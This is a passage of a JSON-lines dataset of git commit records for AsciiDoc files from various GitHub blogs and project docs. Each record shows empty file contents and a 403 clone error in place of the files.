2016-08-26-guidelines-with-google-apps-script.adoc","message":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2878a3251930c611074acf5608de838f00d8906","subject":"Update 2015-06-21-Document-Title.adoc","message":"Update 2015-06-21-Document-Title.adoc","repos":"semarium\/blog,semarium\/blog,semarium\/blog","old_file":"_posts\/2015-06-21-Document-Title.adoc","new_file":"_posts\/2015-06-21-Document-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/semarium\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1faad2586db5b88688130bb121145da7e4797969","subject":"Update 2015-12-14-We-have-a-blog.adoc","message":"Update 2015-12-14-We-have-a-blog.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2015-12-14-We-have-a-blog.adoc","new_file":"_posts\/2015-12-14-We-have-a-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9211b5a2f07ff2f14dc29c39e7d01aff1b84ec7","subject":"Update 2015-11-22-Three-Types-of-Estimates.adoc","message":"Update 2015-11-22-Three-Types-of-Estimates.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2015-11-22-Three-Types-of-Estimates.adoc","new_file":"_posts\/2015-11-22-Three-Types-of-Estimates.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1c2795f380a292d817d1905077b0c2457bd2559","subject":"Update users.asciidoc","message":"Update users.asciidoc","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"community\/users.asciidoc","new_file":"community\/users.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c611903e0b8a4c82d1ead376d8a5ce41a4b8a277","subject":"Update 2015-03-27-a-short-stuff.adoc","message":"Update 2015-03-27-a-short-stuff.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-27-a-short-stuff.adoc","new_file":"_posts\/2015-03-27-a-short-stuff.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f73f19683c1ee2e78289262d7a63c2fce88eb3d0","subject":"Update 2016-04-08-Un-poco-de-Harding.adoc","message":"Update 2016-04-08-Un-poco-de-Harding.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f375ac8ee302d97340482b71c536d1851f19aba7","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"356ab2d105ae5afb3bf8270fd7242e0efadcbedb","subject":"add that pin has to be verified for reset retry counters","message":"add that pin has to be verified for reset retry counters\n","repos":"ato\/yubico-piv-tool,hirden\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,ato\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,hirden\/yubico-piv-tool","old_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"cc09ac0634dbd8e5a6d891ed5b0f7c6ca64fc6e0","subject":"Update 2015-10-05-So-close-yet-so-far.adoc","message":"Update 2015-10-05-So-close-yet-so-far.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"151ea7a347cabb9db640a2ee5a426841f68e0e7e","subject":"Update 2019-02-01-Word-Press-My-S-Q-L.adoc","message":"Update 2019-02-01-Word-Press-My-S-Q-L.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-01-Word-Press-My-S-Q-L.adoc","new_file":"_posts\/2019-02-01-Word-Press-My-S-Q-L.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"678f2b4278e8ff3768fb1c4d1cd0dff92aeb49cd","subject":"Fix link location","message":"Fix link location\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac5dc077c1b161f2a28b1dbf42a76a332f424a28","subject":"y2b create post The iPhone 7 Headphone Jack Is Back!","message":"y2b create post The iPhone 7 Headphone Jack Is 
Back!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-16-The-iPhone-7-Headphone-Jack-Is-Back.adoc","new_file":"_posts\/2016-10-16-The-iPhone-7-Headphone-Jack-Is-Back.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f49a70dd8d792a8f7c0dad98914658e92010d56f","subject":"Update 2017-07-20-Mostrando-dados-na-view-Angular-16x.adoc","message":"Update 2017-07-20-Mostrando-dados-na-view-Angular-16x.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-07-20-Mostrando-dados-na-view-Angular-16x.adoc","new_file":"_posts\/2017-07-20-Mostrando-dados-na-view-Angular-16x.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72216d46958cee3f64dd8c69a1589d446f36bd9d","subject":"y2b create post What's Hiding Inside This Google Pixel Case?","message":"y2b create post What's Hiding Inside This Google Pixel Case?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-07-Whats-Hiding-Inside-This-Google-Pixel-Case.adoc","new_file":"_posts\/2016-11-07-Whats-Hiding-Inside-This-Google-Pixel-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a35c286b649983683b01bf75948c99bdcee6fa9","subject":"Introduce tests table","message":"Introduce tests table\n","repos":"meisterluk\/screenshot-compare","old_file":"tests\/results_table.adoc","new_file":"tests\/results_table.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/meisterluk\/screenshot-compare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b41b5f39426ee59d59272252ea8a6f28160f3e7","subject":"Few words about credentials.zip with no authentication","message":"Few words about credentials.zip with no authentication\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp","old_file":"docs\/credentials.adoc","new_file":"docs\/credentials.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"ee1f9336cc70f4c8d40f68bbf0f791661758a05f","subject":"doc: users-guide: add packet drop and error CoS documentation","message":"doc: users-guide: add packet drop and error CoS documentation\n\nAdds documentation for packet drop policy and Error Class of service\n\nSigned-off-by: Balasubramanian Manoharan <affd9aba178b6c6e9aaff69252817fd03d71ae35@linaro.org>\nReviewed-by: Bill Fischofer 
<52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"ravineet-singh\/odp,ravineet-singh\/odp,dkrot\/odp,erachmi\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,dkrot\/odp,dkrot\/odp,nmorey\/odp,erachmi\/odp,erachmi\/odp,erachmi\/odp,ravineet-singh\/odp,dkrot\/odp,nmorey\/odp,ravineet-singh\/odp,nmorey\/odp,mike-holmes-linaro\/odp,nmorey\/odp","old_file":"doc\/users-guide\/users-guide-cls.adoc","new_file":"doc\/users-guide\/users-guide-cls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b2b0b8f3e33dc5810dead9908b38c4127bee60c3","subject":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","message":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fa96673ed6515ff51cdabaa4e67d2c7d53fd11a","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"958cc42116b1f4012cc05618edac3ce53639c490","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d983b0bdfafbd71344afa27cda0474eb9d476891","subject":"Update 2015-07-23-fw4spl_01021-released.adoc","message":"Update 2015-07-23-fw4spl_01021-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-07-23-fw4spl_01021-released.adoc","new_file":"_posts\/2015-07-23-fw4spl_01021-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65b8322ad2763d27c056de855e49f6a7d6fb03a4","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 
2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78858ed4d8d8b3ad38e3bec9af2e678775dde98a","subject":"Mention in doc","message":"Mention in doc\n\nSigned-off-by: Kanstantsin Shautsou <726516dea2238e859d5028bfb21f227f655fd603@gmail.com>\n","repos":"KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"docs\/FEATURES.adoc","new_file":"docs\/FEATURES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cec999b3258d3cfa16059c76833a405428c42204","subject":"Publish 2016-10-27.adoc","message":"Publish 2016-10-27.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-10-27.adoc","new_file":"2016-10-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69d999d57df8ba7de8de9c01faac72d57226e897","subject":"Update 2017-06-17-Acemice-Belki-Hadsizce-2.adoc","message":"Update 2017-06-17-Acemice-Belki-Hadsizce-2.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-06-17-Acemice-Belki-Hadsizce-2.adoc","new_file":"_posts\/2017-06-17-Acemice-Belki-Hadsizce-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d04e9ed3a3e3beca102bf16512583528a10f4c99","subject":"Create 2017-02-20-test-1.adoc","message":"Create 2017-02-20-test-1.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-20-test-1.adoc","new_file":"_posts\/2017-02-20-test-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5579bffbf93ea80d1d1ea2cd1ea4da16ddcef5d","subject":"Update 2017-02-24-Chrome-Extension.adoc","message":"Update 2017-02-24-Chrome-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Chrome-Extension.adoc","new_file":"_posts\/2017-02-24-Chrome-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b0e83b4cf5d6b132b786a1ab6715e751f95327c","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"cringler\/cringler.github.io,cringler\/cringler.github.io,cringler\/cringler.github.io,cringler\/cringler.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cringler\/cringler.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d139fc0520e27b7339ca116a09ed6ac91db35745","subject":"Add README","message":"Add README\n","repos":"aslakknutsen\/arquillian-example-helloworld","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aslakknutsen\/arquillian-example-helloworld.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb92c13fd9e46180fac1f8782ed3c9d39f1db8ee","subject":"Fixed typo","message":"Fixed typo\n","repos":"netdava\/jbakery,netdava\/jbakery","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netdava\/jbakery.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"318a155b0f3be1f71842ffe005b920cd6df65018","subject":"Artwork badge was broken","message":"Artwork badge was broken\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b22fc982a14c243911f1a3c6ca63e250b085e3d","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"shrinkwrap\/descriptors-docker","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shrinkwrap\/descriptors-docker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7dde1bac6123e76b164c66882cf1534878c00ae7","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/managers_and_ministers.adoc","new_file":"content\/writings\/managers_and_ministers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9e820def1fced1ad10efec46c72afeb0c9e06cc0","subject":"y2b create post You've Never Seen An iPhone Case Do This...","message":"y2b create post You've Never Seen An iPhone Case Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-15-Youve-Never-Seen-An-iPhone-Case-Do-This.adoc","new_file":"_posts\/2017-02-15-Youve-Never-Seen-An-iPhone-Case-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2252a18eabdc1b96d4b728772ad7fbd97188525c","subject":"Add srcdeps-yaml-runtime-overrides.adoc","message":"Add srcdeps-yaml-runtime-overrides.adoc","repos":"srcdeps\/srcdeps-core","old_file":"doc\/srcdeps-yaml-runtime-overrides.adoc","new_file":"doc\/srcdeps-yaml-runtime-overrides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/srcdeps\/srcdeps-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35c128a372b7be8617b89eede6169619bde5b544","subject":"y2b create post THE CRAZIEST KEYBOARD EVER","message":"y2b create post THE CRAZIEST KEYBOARD EVER","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-11-THE-CRAZIEST-KEYBOARD-EVER.adoc","new_file":"_posts\/2016-06-11-THE-CRAZIEST-KEYBOARD-EVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42a07499cd5b2b255a3734a26c9af7000f3cbd89","subject":"[docs] Add an upgrade note about MM threads","message":"[docs] Add an upgrade note about MM threads\n\nSome users configure MM threads to high values to work around the fact\nthat the MM was slow at scheduling tasks. This is now fixed in 1.4, so\nthis patch adds a note about this.\n\nChange-Id: I5b9c36e04d24d0bc9991f19da35b29b474dd6022\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7283\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Jean-Daniel Cryans <4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\n","repos":"andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"157ff14d85083906e7475378a54c5dd78f19127e","subject":"Link to new range partitioning features blog post from release notes","message":"Link to new range partitioning features blog post from release notes\n\nChange-Id: I53116c0c33c00acef8474a14c983822b79388a24\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4086\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon 
<2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f62859748ddc7c7bcc38be1692643442ee5da2b2","subject":"Python note: nonlocal in Python 2","message":"Python note: nonlocal in Python 2\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e2d5c8afd6fd3e9fdddc032c881776b5703b9706","subject":"Get path for site-package","message":"Get path for site-package\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4911458f6fb13ad8c35957b461a374f000c4d19f","subject":"Initial verison of the readme","message":"Initial verison of the readme\n","repos":"redhat-reactive-msa\/redhat-reactive-msa","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-reactive-msa\/redhat-reactive-msa.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85ec1c4c7faa1a3b522d9a476069101c2705cf3e","subject":"added readme","message":"added readme\n","repos":"acierto\/news-dashboard,acierto\/news-dashboard","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acierto\/news-dashboard.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1b7e84c6a7a529b29b4bcc9c782992ad99e77b6","subject":"Fix example configuration in README","message":"Fix example configuration in README\n","repos":"pjanouch\/sdtui,pjanouch\/sdtui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sdtui.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"717817e714a9311f89b6f1029c061c97e25f05e5","subject":"README: Etch out Boom, etch in limit removing.","message":"README: Etch out Boom, etch in limit 
